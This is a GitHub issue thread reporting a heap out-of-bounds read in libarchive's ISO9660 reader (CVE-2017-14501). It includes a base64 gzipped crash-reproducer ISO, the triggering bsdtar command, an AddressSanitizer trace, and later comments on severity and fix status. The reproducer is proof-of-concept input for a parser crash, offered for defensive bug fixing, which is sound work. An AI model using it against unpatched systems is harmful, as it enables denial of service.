Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

out-of-bounds read in archive_read_format_iso9660_read_header() #949

Closed
carnil opened this issue Sep 16, 2017 · 5 comments · Fixed by #1042
Closed

out-of-bounds read in archive_read_format_iso9660_read_header() #949

carnil opened this issue Sep 16, 2017 · 5 comments · Fixed by #1042

Comments

@carnil
Copy link

carnil commented Sep 16, 2017

Hi

The following was reported downstream in Debian in https://bugs.debian.org/875966

The reproducer (compressed with gzip), base64 oob.iso.gz is

H4sIAAAAAAACA+3WsQmAQAwF0NwqTvCtHED3X0mbaxQEwUa897o0v0lCkgAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAbd2SudXbnOqWS33nSeZ0Stcr/rBwBnlwBV+x9/sPAIzDOw4AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAADJAVTyAwTg/wAA

tested against 5562545

ASAN_OPTIONS="detect_leaks=0" ./bsdtar -xOf ~/oob.iso
=================================================================
==13912==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000024800 at pc 0x5644c43511e9 bp 0x7ffc1fbd20d0 sp 0x7ffc1fbd20c8
READ of size 1 at 0x631000024800 thread T0
    #0 0x5644c43511e8 in parse_file_info libarchive/archive_read_support_format_iso9660.c:1767
    #1 0x5644c434c76f in choose_volume libarchive/archive_read_support_format_iso9660.c:1115
    #2 0x5644c434cdeb in archive_read_format_iso9660_read_header libarchive/archive_read_support_format_iso9660.c:1181
    #3 0x5644c4304d61 in _archive_read_next_header2 libarchive/archive_read.c:648
    #4 0x5644c430502f in _archive_read_next_header libarchive/archive_read.c:686
    #5 0x5644c43c938f in archive_read_next_header libarchive/archive_virtual.c:148
    #6 0x5644c42e0110 in read_archive tar/read.c:260
    #7 0x5644c42df303 in tar_mode_x tar/read.c:112
    #8 0x5644c42dc62d in main tar/bsdtar.c:866
    #9 0x7f31071db2e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
    #10 0x5644c42d7f79 in _start (/root/libarchive/bsdtar+0x3ff79)

0x631000024800 is located 0 bytes to the right of 65536-byte region [0x631000014800,0x631000024800)
allocated by thread T0 here:
    #0 0x7f3108af8b70 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xd9b70)
    #1 0x5644c431926e in file_open libarchive/archive_read_open_filename.c:358
    #2 0x5644c4303da8 in archive_read_open1 libarchive/archive_read.c:480
    #3 0x5644c43186ba in archive_read_open_filenames libarchive/archive_read_open_filename.c:152
    #4 0x5644c43182ae in archive_read_open_filename libarchive/archive_read_open_filename.c:109
    #5 0x5644c42dfed2 in read_archive tar/read.c:222
    #6 0x5644c42df303 in tar_mode_x tar/read.c:112
    #7 0x5644c42dc62d in main tar/bsdtar.c:866
    #8 0x7f31071db2e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)

SUMMARY: AddressSanitizer: heap-buffer-overflow libarchive/archive_read_support_format_iso9660.c:1767 in parse_file_info
Shadow bytes around the buggy address:
  0x0c627fffc8b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffc8c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffc8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffc8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffc8f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c627fffc900:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffc910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffc920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffc930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffc940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffc950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==13912==ABORTING
@carnil
Copy link
Author

carnil commented Sep 17, 2017

This issue was assigned CVE-2017-14501

@VictorRodriguez
Copy link

Hi, is there any effort to fix this? How critical is for you this issue ?

@carnil
Copy link
Author

carnil commented Dec 14, 2017 via email

@cemeyer
Copy link

cemeyer commented Aug 2, 2018

Per MITRE,

CVSS v3.0 Severity and Metrics:
Base Score: 6.5 MEDIUM
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H (V3 legend)
Impact Score: 3.6
Exploitability Score: 2.8

@RajeshMalla
Copy link

can anybody tell me whether this is fixed in 3.3.3-1.el8 libarchive or not.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

4 participants